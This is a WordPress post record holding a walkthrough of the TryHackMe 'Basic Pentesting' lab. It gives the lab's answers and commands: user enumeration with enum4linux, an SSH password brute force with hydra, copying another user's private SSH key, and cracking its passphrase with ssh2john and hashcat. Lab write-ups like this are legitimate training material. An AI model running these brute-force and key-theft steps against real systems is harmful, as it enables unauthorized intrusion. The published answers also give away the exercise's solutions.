{"id":191,"date":"2023-04-21T20:16:32","date_gmt":"2023-04-21T12:16:32","guid":{"rendered":"https:\/\/zysgmzb.club\/?p=191"},"modified":"2023-04-21T20:16:32","modified_gmt":"2023-04-21T12:16:32","slug":"tryhackme%e9%9d%b6%e5%9c%ba%e8%ae%b0%e5%bd%95-basic-pentesting","status":"publish","type":"post","link":"https:\/\/zysgmzb.club\/index.php\/archives\/191","title":{"rendered":"TryHackMe\u9776\u573a\u8bb0\u5f55–Basic Pentesting"},"content":{"rendered":"

Basic Pentesting<\/h1>\n

task1<\/h2>\n

Deploy the machine and connect to our network<\/p>\n

Find the services exposed by the machine <\/p>\n

\"\" <\/p>\n

What is the name of the hidden directory on the web server(enter name without \/)?<\/p>\n

\"\" <\/p>\n

development<\/code><\/pre>\n
User brute-forcing to find the username & password<\/p>\n
What is the username?<\/p>\n
enum4linux 10.10.252.28 <\/code><\/pre>\n
\"\"<\/p>\n
jan<\/code><\/pre>\n
What is the password?<\/p>\n
hydra -l jan -P .\/webtools\/rockyou.txt 10.10.252.28 ssh<\/code><\/pre>\n
[22][ssh] host: 10.10.252.28   login: jan   password: armando<\/code><\/pre>\n
What service do you use to access the server(answer in abbreviation in all caps)?<\/p>\n
SSH<\/code><\/pre>\n
Enumerate the machine to find any vectors for privilege escalation <\/p>\n
What is the name of the other user you found(all lower case)?<\/p>\n
kay<\/code><\/pre>\n
If you have found another user, what can you do with this information?<\/p>\n
What is the final password you obtain?<\/p>\n
scp jan@10.10.252.28:\/home\/kay\/.ssh\/id_rsa .\/\nssh2john id_rsa > 1.txt\nhashcat -m 22931 1.txt  -a 0 .\/webtools\/rockyou.txt  --force<\/code><\/pre>\n
\"\"<\/p>\n
\"\"<\/p>\n
heresareallystrongpasswordthatfollowsthepasswordpolicy$$<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
Basic Pentesting task1 Deploy the machine and connect to our network Find the services exposed by the machine What is the name of the hidden directory on the web server(enter name without \/)? developm […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-191","post","type-post","status-publish","format-standard","hentry","category-learn"],"_links":{"self":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/191","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/comments?post=191"}],"version-history":[{"count":1,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/191\/revisions"}],"predecessor-version":[{"id":192,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/191\/revisions\/192"}],"wp:attachment":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/media?parent=191"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/categories?post=191"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/tags?post=191"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}